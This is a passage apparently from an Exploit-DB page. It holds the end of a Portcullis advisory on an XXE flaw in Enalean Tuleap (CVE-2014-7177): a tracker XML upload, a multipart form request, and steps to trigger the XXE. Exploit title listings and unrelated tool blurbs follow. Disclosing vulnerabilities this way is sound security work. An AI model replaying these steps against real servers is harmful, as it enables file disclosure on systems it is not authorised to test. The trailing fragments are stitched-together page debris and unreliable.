    <permission scope="field" REF="F9" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F14" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F14" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F14" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F15" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F15" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F15" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F19" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F19" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F19" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F20" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F20" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F20" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F22" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F22" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F22" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F24" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F24" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F24" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F26" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F26" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F26" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F28" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F29" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F29" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F29" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F31" ugroup="UGROUP_PROJECT_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F32" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F32" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F32" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F33" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F33" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F33" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F34" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F34" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F34" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <!--TODO TRACKER_ADMIN <permission scope="field" REF="F31" ugroup="UGROUP_PLUGIN_TRACKER_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/> -->
  </permissions>
</tracker>

-----------------------------12077103611061
Content-Disposition: form-data; name="name"

Bugs
-----------------------------12077103611061
Content-Disposition: form-data; name="description"

Bugs Tracker
-----------------------------12077103611061
Content-Disposition: form-data; name="itemname"

bug
-----------------------------12077103611061
Content-Disposition: form-data; name="Create"

Créer
-----------------------------12077103611061--


2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:


https://[ip]/plugins/tracker/?group_id=102&tracker=12


3) Using retrieved tracker number and URL, a XXE can be trigerred by visiting the retrieved URL:


https://[ip]/plugins/tracker/?group_id=102&tracker=12


Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7177/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2016-02-03 "Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting" webapps hardware Portcullis
2015-09-25 "X2Engine 4.2 - Cross-Site Request Forgery" webapps php Portcullis
2015-09-25 "X2Engine 4.2 - Arbitrary File Upload" webapps php Portcullis
2015-07-14 "Pimcore CMS Build 3450 - Directory Traversal" webapps xml Portcullis
2015-04-21 "BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion" webapps cfm Portcullis
2014-12-10 "OpenEMR 4.1.2(7) - Multiple SQL Injections" webapps php Portcullis
2014-10-28 "Enalean Tuleap 7.4.99.5 - Remote Command Execution" webapps php Portcullis
2014-10-28 "Enalean Tuleap 7.4.99.5 - Blind SQL Injection" webapps php Portcullis
2014-10-28 "Enalean Tuleap 7.2 - XML External Entity File Disclosure" webapps php Portcullis
2014-10-02 "PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution" webapps php Portcullis
2014-10-02 "TestLink 1.9.11 - Multiple SQL Injections" webapps php Portcullis
2014-06-12 "IBM AIX 6.1.8 - 'libodm' Arbitrary File Write" local aix Portcullis
2014-05-14 "Broadcom PIPA C211 - Sensitive Information Disclosure" webapps hardware Portcullis
2014-04-24 "dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read" webapps php Portcullis
2014-03-12 "Procentia IntelliPen 1.1.12.1520 - 'data.aspx' Blind SQL Injection" webapps asp Portcullis
2014-03-12 "vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion" webapps php Portcullis
2014-03-10 "ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution" webapps multiple Portcullis
2014-03-01 "Oracle Demantra 12.2.1 - SQL Injection" webapps windows Portcullis
2014-03-01 "Oracle Demantra 12.2.1 - Persistent Cross-Site Scripting" webapps windows Portcullis
2014-03-01 "Oracle Demantra 12.2.1 - Arbitrary File Disclosure" webapps windows Portcullis
2014-03-01 "Oracle Demantra 12.2.1 - Database Credentials Disclosure" webapps windows Portcullis
2008-05-11 "ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection" webapps php Portcullis
2008-05-08 "SAP Internet Transaction Server 6200.1017.50954.0 Bu (WGate) - 'wgate.dll?~service' Cross-Site Scripting" webapps cgi Portcullis
2008-05-08 "SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting" webapps cgi Portcullis
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.